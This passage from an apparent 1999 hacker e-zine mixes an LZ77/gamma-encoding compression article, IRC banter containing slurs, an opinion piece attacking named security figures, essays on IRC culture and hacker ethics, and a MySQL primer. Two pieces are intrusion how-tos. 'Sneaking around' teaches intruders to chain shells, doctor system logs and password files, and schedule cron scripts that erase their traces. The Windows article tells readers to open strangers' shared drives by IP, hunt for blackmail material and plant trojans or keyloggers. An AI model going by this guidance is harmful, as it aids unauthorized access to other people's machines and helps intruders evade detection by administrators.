phrase matches, having to encode the indexes in 16bits will probably yield a worse compression ratio. The best solution to this problem is to use a statistical layer, such as huffman to optimally encode the indexes, lengths, and literals. Unfortunately, this adds some degree of complexity to your compressor and decompressor. So, the most viable solution is to use a type of gamma encoding, which is in reality a statistical encoder that makes certain assumptions, such as the smallest integers will be the most common. Gamma Encoding -------------- Gamma encoding allows for encoding of integers, with the encoding also relaying the size of the integer. Therefore, gamma encoding removes the dependency on static integer lengths. Gamma encoding should only be applied to symbols where the smallest value is the most common; a good example of which is phrase lengths. Normal Gamma Encoding --------------------- Normal gamma encoding involves storing a number of 1 bits equal to the number of bits in the integer, then a 0 bit, then the integer itself. For example 10111b would be encoded 11111010111b. Interleaving the tag bits with the bits of the integer yields easy decoding, which would give us 1101111110b for the above example. As you can see, every other bit acts as a virtual stop/go bit, 1 indicating continue, 0 indicating stop. Now, when we interleave the bits like this, we notice that the first two will always be 1 on integers greater than 1. Therefore, if we assume that we will never need to gamma encode an integer less than 2 (which is usually the smallest phrase length), then we can omit encoding the first bit of the integer, therefore saving two bits for every integer. Examples of this gamma encoding: Normal Gamma Encoding 0 - 0 = 0b 1 - 1b = 101b 2 - 10b = 11010b 3 - 11b = 11011b 4 - 100b = 1110100b 5 - 101b = 1110101b 6 - 110b = 1110110b Interleaved Gamma Encoding 0 - 0 = 0b 1 - 1b = 10b 2 - 10b = 1100b 3 - 11b = 1110b 4 - 100b = 110100b 5 - 101b = 110110b 6 - 110b = 111100b Gamma encoding with most significant bit omitted: 0 - 0b = (cannot be encoded) 1 - 1b = (cannot be encoded) 2 - 10b = 00b 3 - 11b = 10b 4 - 100b = 0100b 5 - 101b = 0110b 6 - 110b = 1101b Punctured Gamma Encoding ----------------------------- Punctured gamma encoding is optimal in some circumstances. In punctured gamma encoding we encode the integer backwards, storing a stop/go bit after every one bit. Assuming 0 will be the stop bit, and 1 will be the go bit, here is are examples of encoding 1-6: Punctured Gamma Encoding: 0 - 0 = (cannot be encoded) 1 - 1b = 10b 2 - 10b = 010b 3 - 11b = 1110b 4 - 100b = 0010b 5 - 101b = 11010b 6 - 110b = 01110b As you can see, the optimality of punctured gamma encoding depends on the number of one bits in the integer. For an integer such as 10000000b, we only need one extra bit to encode it as 000000010b, where-as an integer such as 11111111b will require twice as many bits to encode, 1111111111111110b. Delta Encoding -------------- Delta encoding basically gamma encodes the number of bits in the integer. For example, in normal gamma encoding we would have the following, as stated previously: 0 - 0 = 0b 1 - 1b = 101b 2 - 10b = 11010b 3 - 11b = 11011b 4 - 100b = 1110100b 5 - 101b = 1110101b 6 - 110b = 1110110b By gamma encoding (using interleaved with high bit omission) the number of bits in the integer as an integer, we would have: 0 - 0 = (cannot be encoded) 1 - 1b = (cannot be encoded) 2 - 10b = 0010b 3 - 11b = 1011b 4 - 100b = 0100100b 5 - 101b = 0110101b 6 - 110b = 1101110b Clearly, delta encoding is only optimal where the distribution of integers is larger. For example, compare the interleaved, high-bit omitted gamma with the delta for integer 1111111111111111b (0ffffh): Gamma: 11111111 11111111 11111111 111110 (30 bits) 16 bits in integer = 10000b = 01010100b Delta: 01010100 11111111 11111111 (24 bits) [16] [integer] Other Tricks ============ Lazy Evaluation --------------- Lazy evaluation checks to see if there is a better match at the current pointer+1 before it encodes a match at the current pointer. For example, if you were encoding the following: ABDBCDEF ABCDEF When we reach the second occurrence of 'ABC' we will find a two byte match, however if we skip that match and encode 'A' as a literal then we will find a five byte match 'BCDEF', So the encoding would be A[6,5] with lazy evaluation, and [8,2][6,4] without. Since codewords are usually always longer than literals, the lazy evaluation would save us bits by encoding a single larger phrase and a literal as opposed to two smaller phrases. Run-Length-Encoding in LZ77 class --------------------------------- A nice advantage of the LZ77 class of compressors is that RLE can be built into the compressor and decompressor without any changes other than allowing the phrase compare during the phrase search to extend past the current pointer. For example, if we have the following run: offset 01234567 byte 00000000 We would first encode literal 0, then as we are searching for a matching phrase for the second 0, we would find the first 0. Allowing the compare to extend past the current pointer of 1, we would find that there is a 7 byte match at index 1. So, we would simply encode 0[1,7]. During decompression, we would just start copying at index 1 and as we are copying we would be copying the next byte to be copied. What I mean to say is that a simple, 'rep movsb' would work as it would in any normal phrase. Conclusion ========== Well, maybe this not-so-well-written article has at least peaked your curiosity about data compression. A fair warning though, it's takes a hell of alot of work to beat compression software already available; indeed, I seemed to have forfeited my own life in the data compression quest. Credits ======== Johnny Panic and Jibz helped me alot while I was developing JCALG1, it is to them I owe most of my knowledge of compression. Jeremy (collake@charter.net ) ******************************************************************************** IRC Crap hehe by awnix if you say this crap in a 'proper' channel you get beaten up. a/s/l? - age / sex / location? - The utmost lamest thing you can say, if you don't count - <{DJ}mAdKiNg> ah aM 3l3eT pH34r!@#$ sup/wassup ? - translation - Greetings! I am a paedophillic warez pup wigger! < numbers, alternate casing, and excessive punctuation> - ie. y0 n33g4z w4dduP 1n d4 gH3t70?!?!@#$ - I will physically kick your ass if you do. < acting like a 'badass mutha fucken n33gr0!#$' > - You are obviously are very deprived little - little boy, that sits inside all day d/loading - warez and pornography, and nuking decent people - I will come around to your house and kick you - in the pre-pubescent nads. St00p1d b1aTcH!@#$. QUOTE OF THE... ISSUE: I have been on irc for many years but now there is this new hacker out there called nickserv and everytime I connect he changes my nick. Can anyone help? Thankyou. Thankyou very much. ************************************************************************************* -=[ sneaking around ]=- by: max july 99 NOTE: this article requires at least a substantial amount of knowledge and experience with the general unix operating system. if the reader currently doesn't have these prerequisites, he/she shouldn't be reading this article. the purpose of this particular article is to inform others about the various methods and techniques for keeping yourself safe from administrator detection in an array of systems. furthermore, i do not encourage network intrusions or web defacements. do so at your own risk. (not to be hypocritical, but i'm not denying the fact that i've never done the aforementioned actions). with that said, let's begin. first of all, whatever you do, no matter how much you yearn to brag and boast of your elite hacking accomplishments, never speak of your dirty deeds to anyone, anywhere. there are many different reasons for not doing so, but your major concern is the chance of there being an informant for a federal agency, etc. remember, you can never be too paranoid. that is one of my golden rules. ok, before you even get root access for the box, you need to take some preliminary precautions. when probing and scanning the box, you should be using an external and separate shell, and if possible, another one (or multiple) on top of the first. the reasons for doing this should be self-evident and obvious, but if not, i shall explain. it will be much more difficult and time-consuming to trace the hacker in question if the previous precautions are taken. the reason being is that if the admin(s) somehow find the hostname and/or ip address from the first box you were using, if you were using multiple shells, he/she would have to untangle a huge web of systems, regions and accounts. i do not recommend using a wingate as opposed to a shell, because you never know who is watching over it, and chances are it's like a cheap skanky whore (it's been used quite a few times by others. heh.). now let's assume you've taken complete control of the particular box in question. what do you do now? well, our first task at hand is to wipe clean all of the lines regarding our little stunt from all of the relevant logs. as we all should know by now, on most unix boxen, the directory that logs get stored in are under the /var/* hierarchy. for example, the three main directories should be: /var/log, /var/adm, and sometimes /var/audit. but, if possible, try very hard not to completely remove the log files contained in those directories. if you do that, it will be very obvious to the admin(s) that there has been a network intrusion. just in case you accidentally 'rm' the directories or log files, what you should do is recreate the old files with the same name, permissions, owner, and group of the previous logs/directories, using the commands: 'mkdir', 'chmod', 'chown', 'chgrp', respectively. in addition, if possible, try not to make a whole new password file. instead, just add or modify certain entries to your liking. this reduces the chances of the admin(s) becoming aware of the security breach. what i also recommend you doing is creating a shell script, perl script or cron entry that wipes out only the lines of your escapades and nothing else, in the previously mentioned log files at specified intervals of time. you can accomplish this by writing a perl script which uses the 'grep' command (or another similar function) with your ip address or hostname as the argument. of course, there's more to it than that, but i'm not going to delve into the specifics of the script. when that is finished, just add a cron entry which executes your script every so often. this is perfect for the lazy hacker/intruder and reduces the amount of keystrokes and time necessary for editing the logs. make sure, just in case, to set protective permissions on these scripts/entries/etc., because you don't want anyone else to be able to discover your means of stealth and cunning. finally, never stray from these tips and rules. try very hard not to become lazy and slack off. if this occurs too many times, you'll be seeing more of that suspicious black van across the street. until next time.. trust no one.. *************************************************************************************** =[ Experts or Fakes? ]= Disclaimer Towards This Article Anything said below should not be twisted around. Whatever was said below was found on the public internet and if you attempt to do your normal thing and sue for someone making fun of you, well, get your facts straight, because this article isn't about making fun of you. This article is expressing the opinion from a real Network Security Consultant, not a make-believe one with only media skill. Anything you dislike in this article is what you call an "opinion" and as citizen of the United States i have the right to "Freedom of Speech", have you ever heard of that? Nothing below is meant to hurt your character, but it is meant to put a damper in your opinions towards other people if you are mentioned in this article. Don't take anything i say below WAY too seriously or out of hand, because i would appreciate if you researched what is said below and show fact for fact that most of this article will not be assumptions, it will be stated of true BOLD printed facts. I could care less if you hold me responsible for this article, because i have a right to post it and i have the right to speak upon what i believe in. Below you will understand what is going on in my head and you will most likely believe the exact same ethics and thoughts about these people the same way i do. As time goes on in the life of an internet junkie in which you may be or even a well organized businessman, if you read about the underground scene, hacking scene, network security scene or anything related then you might have heard of some of these names in which are mentioned in here. Let me get off my chest first that these are my opinions based on facts found on the internet and that i am not attempting to destroy anyone's character, because if you stay on the same track as this article goes by, then you will see that these people make their own character look rather non- professional or in simple terms "plain stupid". I have never seen anyone to my knowledge of 19 years attempt to sue so many people in my life over illegitimate mishaps. We present you John Vranesevich who at the time i got raided, posted that i was arrested and got bailed out by my family. If i was the "professional" like John Vranesevich i would have sued him for slander and other time consuming ways to get back at him, but instead of doing something that would have downgraded myself to his level, i simply called him and asked him what this article was about and why he was posting false information about me. He told me via the telephone that he got this information from a, and i quote "reliable source" when i asked about it. Great reliable sources you got there guy, who didn't even get 1 bit of information correct, besides the fact that i was raided. This tends to happen often with John since his reliable sources were at that time, internet kids, who could possibly come up with any story in which they wish and this time, they did and he posted it. He told me he would replace and take it down, but he wouldn't let me know who his source is, which in my opinion, he had none. (Notice: These following words are opinions expressed, not to hurt character) I figured he had no better story and since at that time my group (gH) was pretty much all over the media for compromising and defacing www.whitehouse.gov, so he wanted in on the action because not many people in my group liked him and would give a story that he wanted, so he made one up, go figure. (End of opinion) Nevertheless, i moved on with my life, but has John, not in my eyes. After getting raided a story was done about me and my group on the front page of the USA TODAY saying that John is "trusted by outlaw elements of the hacker comunity" which i would like to state my opinion on how a person like me can trust someone who has turned his back on something that makes his business run. "Hackers" make the internet go round and round, not John the so called "cyberspace expert" who to my knowledge, correct me if i'm wrong, hired others to secure his network. Enough about him, so for more information simply scroll down and some provided links will happily inform you more on this expert in the shadows of hackers. We all want to be someone special when we grow up and make a difference, for instance another known "security expert" calling herself the "granny hacker", which in my opinion is more like a non-professional media specialist. So much can be said about Carolyn Meinel who runs happyhacker.org which if you are like and have ever accessed it, you could see how non-organized this place is. In all do respect, security is the greatest thing to the internet, but the skill is to secure your network or workstation as much as possible to your full capabilities and still allow your users to get the full capability of the operating system at hand. These machines aren't secure, they are completely revamped to not let the user do anything whatsoever, which makes it almost imposible to gain root access. Is this how security is supposed to be done by a "security expert"? I would have to say NO! I would never attempt to limit needed access to programs most used by users to simply prove i'm a security expert. I do network security every single day and have NEVER done anything like this before. Also, in some articles she has called hacking "easy", which in due time could be to the greatest of all people, but to a simple user, not a chance. Maybe she is referring to a script kid of some sort who can run automated programs written by other people to gain root on a machine, but if you want to get to the technical basis of being a "hacker" you must not only know unix, but how everything works, such as routing, tcp/ip, programming and the full capabilities of your skills at hand. Also, i noticed many articles written by her concentrating on how to hack legitly in windows? What she has expressed is not the type of stuff i would consider as "hacking", but since she is the expert, we must all listen to her, correct? No, like i am doing right now, we must stand for ourself in our own scene in which we created, not people like who attempt to be a living stereotype of the "hacker" ethics that we created. I also noticed a link on her site to governmental webpages, (Note: These following words are opinions expressed, not facts) yet i see it as a doorway to any "hacker" to visit her site to attempt to break into government sites or give them an idea, but that might not be her main purpose. One thing i can relate to is how she commented about a group of people ratting out my group and how she discussed my group being raided was an event of a group of my friends being rats. She knows nothing on my group, has never talked with anyone in my group and we will never stoop to her level to even discuss security related issues with her type of incompatence and that is a fact. I see nothing but windows commands run in a dos prompt and nothing unix based coming out of her articles and that is a bad vision on how everything is really done. Last, but definately not least is her articles and how they are professional written in ircish talk, using !@#@!# and smily faces such as :) and characters like that even in her interviews with newspapers to express herself. I honestly must say in all due respect, this gives our community a bad name, making us look like our scene is revolved around internet relay chat, which it is not. I see no expressions written here like that and you won't, because i don't live, sleep and think irc, unlike her, i am a security consultant and deal with proffesionalism. Below are links about Carolyn Meinel as well. This is where my opinions come in about these 2 individuals and it is like i said my right to have a freedom of speech. One shut down packet storm and one gets kicked out of defcon, what kind of people are we dealing with that the world calls experts? In my vision i see 2 kids with big names and no knowledge whatsoever and if it came down to it, i would challenge either one of them to a debate of knowledge or skill in any security related issue. I and noone in this zine are afraid of either of these individuals nor will i or anyone else stand for this type of disrespect to a world of great minds put together that we created to sit and watch it get destroyed by the enemy. Packet storm was respected by numorous corporations around the world, helped admins around the world and got alot of people great respect for their programming skill, something the other individuals named here have none of, so i stand to state that if they want to fight what we created, we should fight for what we beleive in. Sueing someone or attempting to sue someone over petty things is not on my list, i have the knowledge to fight with my mind and ethics on the situation at hand and i need no legal upholders to support my battle, i am myself as well as you are yourself. Me as well as you probably as well do security or whatever you do for the fun and not to get a big name to use it against other people to shut them down, because they are a threat to your corporation. The moral of this whole section would be: "Battle with knowledge and love for the sport, not with money and publicity you made from the sport." [John Vranesevich] http://www.attrition.org/netgation [Carolyn Meinel] http://www.antionline.com/cgi-bin/News?type=antionline&date=07-19-1999&story=CMDC2.news (She talked about my group!) http://netsecurity.about.com/library/weekly/aa052598.htm?pid=2822&cob=home http://www.antionline.com/features/quick_tips/ http://www.pc-radio.com/pcworld/meinel.html http://www.happyhacker.org I would like to thank l0pht & cDc for proving a monopoly means nothing and is a great example of my moral which is stated above, all my gH members, attrition.org, the associated press, my family for supporting me everyday of my life, adam at posix.net for hosting pure-security.net for me and last but not least the government for raiding me, which finally pointed me in the right direction to help networks around the world. mosthated of gH most@pure-security.net http://www.pure-security.net/ ***************************************************************************************** Hello, my name is Jen. I decided to write an article on the role that females play on irc, and the overall personna that is created based solely on their gender. The basis for this article was made on assumptions created by a survey taken, questioning close to 30 active irc users. Most questioned were people of #b4b0, or friends of mine (see list of nicks below). The questions i asked, consisted mainly of "what do you think of females on irc", and to the girls, i asked mainly "do you feel as though you're treated differently, for the sole reason of being female". The feedback I received, varied a little, but the overall conclusion resulted in, 'yes, females are treated differently'. Although, the ways that the females were differentiated, varied from guys either being harsh or overly nice. Their intensions were also questioned in the survey, and I'd have to say that overall the guys with which we associate are warm-hearted and sincere, but occasionally lacking entertainment or suffering from boredom. I wasn't surprised to find that a lot of the guys question the authenticity of the information that a girl offers (eg. pictures, personal information, sexual oriented information, gender, etc.) Not many of the guys made a decision that just because a girl is on irc, means that she is either lifeless or unworthy. However, there was a comment made, that basically noted "the reason for a girl to be on irc is to get attention, so she will do whatever is asked of her, including cybersex or phonesex, to accomplish a sort of acceptance, or acknowledgement". Girls be proud of these guys though, and appreciate the hard work and effort of their endeavors, because they're willing to share their knowledge and teach you. All of the guys in the survey denied that they would not coach or teach someone just because they are female. There is no reason why we shouldn't have interest in what the guys are passionate about, or what they excel in, if we're going to spend so much time with them, or in their presence. I would also guess that, we might be respected more, if we did make at least the effort to learn about the things that they participate in. I asked the girls if they were upset or frustrated by the expectations made by guys online. The comparisons, expectations, standards, we all know these obstacles can at times be upsetting or disppointing. After surveying the girls, i was surprised to find that most of them didn't really care what the guys thought about them. Seeming pretty confident (unfortunately, i am lacking in this attribute, so my perspective is different from some of the girls), a lot of them seemed to make the decision that, if they're not seen as being good enough, than the person judging was obviously the inferriorone. The basic conclusion, and request from this article, comes down to, appreciate and respect each other equally. Be there for people, for the reason of making a difference, not for the expectation of receiving some kind of "favor" in return. Don't make assumptions about someone, nor create pretenses to be appreciated. If you have to have a nude picture with a saying "bozo owns me" accross your chest, than obviously there is lack for respect, acknowledgement, and appreciation for the person you are, and for your expression. It's commonly said that you can't really know someone from irc on a personal level, but i disagree. Intimacy and friendship is very apparent online. Appreciate the people that you spend hours with, without being so harsh and insulting without reason. Oh, last thing...everyone denies their cybering experience, so why do us girls recieve constant requests? ;P Special thanks to everyone that participated in the survey, and especially to b4b0. (tip, tgb, dono, pr0phet, polder, jsbach, mosthated, angieb, mynd, icesk, misfit, eckis, kyle, borgie, justin, n0k1a, KKR, schemerz, sistym, opcode, ch1ckie, r1ngy, hitman, mya) ~lusta ************************************************************************************ Our roots and our rights. As I started this article, I was attempting to do a piece on ethical hacking, I got way up on my soap box and started whaling away at the keys. While writing I decided I wanted to cite Steven Levy�s "Hackers" as a source to prove my point.. I started re-reading it, for probably the tenth time, but the first in 3 or 4 years.. what I realized as I read the first few chapters smacked me in the face and reminded me why I�m here, and what this is all about. As "Hackers" we from the very beginning have faced people and forces that, for whatever reasons, would rather we use machines the way they want us to, and not the way we deem fit. And, although I still find some web page defacing and the like to be a bad idea, and the wrong way to go about things, I am now completely reminded of the frustration that brings us to these ends. At our culture�s humble beginnings, we were faced with administration that wanted to keep our kind as far away from the actual machines as possible ("Hackers" - Steven Levy, Chapter 1, �Tech Model Railroad Club� ), what spawned out of their unrelenting efforts to touch and feel was the very first interactive programming, something everyone takes for granted today. This is one of many examples of how we as the digital underground forge new ground, take things to the next level, and create magic. Many, many ideas were born out of these simple quests to do something �more� with the machines around us. In fact, the browser you use to view this zine began life as one of those odd little ideas that struck someone one day, and grew to become popular culture, and something we take for granted everyday. It appears another revolution is at hand, forces stacking stores of offensive armament on each side, each prepared to fight for what they see as the proper future of the online world. We all have our ways to further our side of this cause, whether they be brut force, as some of the more publicized efforts of late have been, or through more conventional, political means of motivation. The one thing that is crystal clear to me is that, we all must do our parts and do them well in order for our voices to be heard in the proper perspective by an all to often under educated and fear mongering public. Get out there, campaign for elected officials that support free-speech online, loosened encryption laws, and free dissemination of information. When you hear someone telling the facts wrong, do your best to make sure they are corrected and, corrected in a manner that makes us look good not ways that make us into villains and bandits in this new frontier. Radicals and free thinkers founded this country and, in my humble hacker opinion, it�s about time that we, as the free-thinkers of our generation, take back what was once such a great foundation. Blackice blackice@anti-social.com http://www.mi6-general.com/ ************************************************************************************* WARNING: This article may contain, but not endorse spelling errors, dirty language, extreme stupidity, maliciousness, shoplifting and rude behavior. Please do not take it seriously or use it as toilet paper. Vulnerabilities in Win95/98 and NT boxes. By, colevert I wrote this article at two in the morning, so don't expect to much from it. =] Win boxes were never really known for there security over networks actually they were never known for security at all really. I mean when was the last time you heard a sysadmin say 'Damn if only we were running windows we could have avoided that hack' since infact anyone can basically open one up like can of worms without the owner knowing, or not knowing enough to care. There are simple things the owner of the machine can over look. Simple they may be, but useful to someone who knows how to exploit these simple little things. The one such thing I'm writing about here is quite simple. It's allowing your computer to access shared files/folders/drives/printers on another win95 box over a network. Doesnt sound like much, but it can be quite useful. For example, you can install their printer on your computer and print out cute little messages on their end. EX: 'I can see you', or such classic's as 'OWNED' or that over-do term paper you never printed out becouse, hey you don't have a printer. The more useful things you can do with to a shared computer is look at files. You know find those silly little black mail things no one was supposed to see.. just use your imagination.. Anyway enough about what you can do, heres how to set up your box so you can do it. A lot of you may or may not already know about this, those who do are probably making joyous fun of my skillz. =] I've never tried setting this up on a Win98 machine but I'm sure it's not much different. Setting it up ------------------ For this to work you must have Winsock 2.2 installed, if you do not, you can find the upgrades just about anywhere. Microsoft.com should have them. Click on Control Panel. Then Double Click on Network. If you do not have 'Client for Microsoft Networks' listed under the installed components box, click on add. If it is listed skip the rest of the setup process. After choosing add the type of network component you will select is Client. >From the manufactures list you will choose Microsoft (hey what did you expect). The type of client you will choose is Client for Microsoft Networks. Click on ok. You may need your windows install disk. Reboot. That was simple huh? Use ------------------ To use this all you need is the victom machines IP address. Keep in mind that not all win boxes are Vulnerable only ones that have sharing enabled. I have found that many people do have much shared. It's a great way to get mp3's, pron or even stuff you have no business having. Just pop in on the drives and have a look see. It can be useful (considering you have write access to the drive) when planting a Trojan or keylogger. to use simply type \\ipaddress in your run box. Now that you are ready to rock you can check to see if you computer is Vulnerable to these type of low budget hacks. Go to he run box and type \\youripaddress If a box pops up that says something to the effect of Network Name Can not be found, you are not Vulnerable. If a Folder pops up with drive listings you are Vulnerable. The only tough part about this is finding machines that have full sharing on them. You can try incorporating this into an irc script that will try an IP address when you click on it, or a whole bunch of IP addresses. I know there are some scripts or add-ons out there already that do this. If you cant find any victoms, you can always make some. Well considering you have local access to the computer you want to attack. Just open it up to share everything. This can be useful when working on networks and needing to copy large files from one machine to another. -colevert ***************************************************************************** ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + chrak's MySQL Intro + + + + Part I + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ MySQL is an SQL database server developed by TcX. It can be found at http://www.mysql.com. It has a client library that is public domain for programmers to connect, query and get results from the server. the client named mysql may be used for monitoring and simple updates of your databases. use it as mysql -h host -u user -p. Note the MySQL accounts are not the same as the systems. A special database is used to hold privilege information. To create and use a new database we could do something like this: mysql> CREATE DATABASE blah; mysql> USE blah now we must create a table to hold our data: mysql> CREATE table cowinfos (name VARCHAR(15), age INTEGER, weight INTEGER); to show the table we created: mysql> DESCRIBE cowinfos; +--------+-------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +--------+-------------+------+-----+---------+-------+ | name | varchar(15) | YES | | NULL | | | age | int(11) | YES | | NULL | | | weight | int(11) | YES | | NULL | | +--------+-------------+------+-----+---------+-------+ 3 rows in set (0.16 sec) varchar is a datatype which in this case holds upto 15 characters. Now lets fill our table up with useful COW INFOS: mysql> INSERT INTO cowinfos VALUES -> ('Betsy', 17, 409); Query OK, 1 row affected (0.07 sec) mysql> INSERT INTO cowinfos VALUES -> ('Jethro', 5, 547); Query OK, 1 row affected (0.00 sec) mysql> INSERT INTO cowinfos VALUES -> ('Hambone', 9, 320); Query OK, 1 row affected (0.00 sec) To dump the tables contents we can do: mysql> SELECT * FROM cowinfos; +---------+------+--------+ | name | age | weight | +---------+------+--------+ | Betsy | 17 | 409 | | Jethro | 5 | 547 | | Hambone | 9 | 320 | +---------+------+--------+ 3 rows in set (0.09 sec) now to search for entrys we can do: mysql> SELECT * FROM cowinfos WHERE name='Betsy'; +-------+------+--------+ | name | age | weight | +-------+------+--------+ | Betsy | 17 | 409 | +-------+------+--------+ 1 row in set (0.09 sec) To get the names of the cows that are under 500 pounds we could do: mysql> SELECT name FROM cowinfos WHERE weight <= 500; +---------+ | name | +---------+ | Betsy | | Hambone | +---------+ 2 rows in set (0.00 sec) Now that all the cows have been turned into hamburger we do not require this information. We'll do a: mysql> DROP table cowinfos; mysql> DROP database blah; And thats the end of the vital cow information. Part 2 will be included in issue two of nou... ********************************************************************************** Well...that's it for this issue of Nations of Ulysses. Please check back in September for the second issue. Thanks for your interest and support in this publication. ,_ .--. Special , , _)\/ ;--. Thanks to: . ' . \_\-' | .' \ -= * =- (.-, / / | b4b0 ' .\' ). ))/ .' _/\ / 9x \_ \_ /( / \ /( #2600 /_\ .--' `-. // \ phrozen crew ||\/ , '._// | foonet ||/ /`(_ (_,;`-._/ / \_.' ) /`\ .' and everyone else .' . | ;. /` that's supported / |\( `.( and contributed | |/ | ` ` to this issue | | / | |.' __/' _ .' _.-` _.` `.-;`/ CIAO! ;) /_.-'` / / | / ( / /_/